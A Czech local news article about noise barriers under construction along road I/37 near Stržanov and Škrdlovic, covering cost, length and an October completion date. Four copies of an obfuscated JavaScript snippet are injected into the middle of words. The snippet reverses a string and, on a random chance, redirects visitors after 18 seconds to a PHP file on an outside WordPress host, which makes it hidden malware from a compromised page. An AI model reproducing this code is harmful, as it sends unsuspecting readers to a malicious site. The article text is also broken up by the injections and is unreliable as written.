Rainbow page separator

Protihlukové stěny u Stržanova a Škrdlovic dokončí v říjnu

Sobota, 12. srpna 2023

Žďár nad Sázavou / Podél frekven$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tované silnice I/37 ve žďárské místní části Stržanov a u nedalekých Škrdlovic už druhým měsícem probíhají práce na výstavbě protihlukových stěn. Aktuálně dělníci be$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonují vyvázané armatury a upravují příkopy a okolní terén. Ukončení stavebních prací probíhajících za částečného omezení dopravy je naplánováno v říjnu. Realizace projektu v režii Ředitelství silnic a dálnic (ŘSD) ČR coby správce státní komunikace vyjde na bezmála padesát milionů korun bez DPH. Důvodem výstavby bariér je zajištění dostatečné ochrany obyvatel žijících v těsné blízkosti rušné komunikace před nadlimitním hlukem ze silniční dopravy. Dotčeným úsekem projede podle posledního sčítání denně na šest tisíc aut, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to včetně nákladních vozidel a kamionů, přičemž tranzitní doprava se na intenzitě podílí přibližně třetinou. Celková délka protihlukových stěn stavebně rozdělených do čtyř úseků bude 852 metrů, jejich výška dosáhne 2,5 až 5 metrů. Bariéry podél silnice budou z větší části průhledné z tvrzeného plexiskla v kombinaci s be$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tonovými prefabrikáty.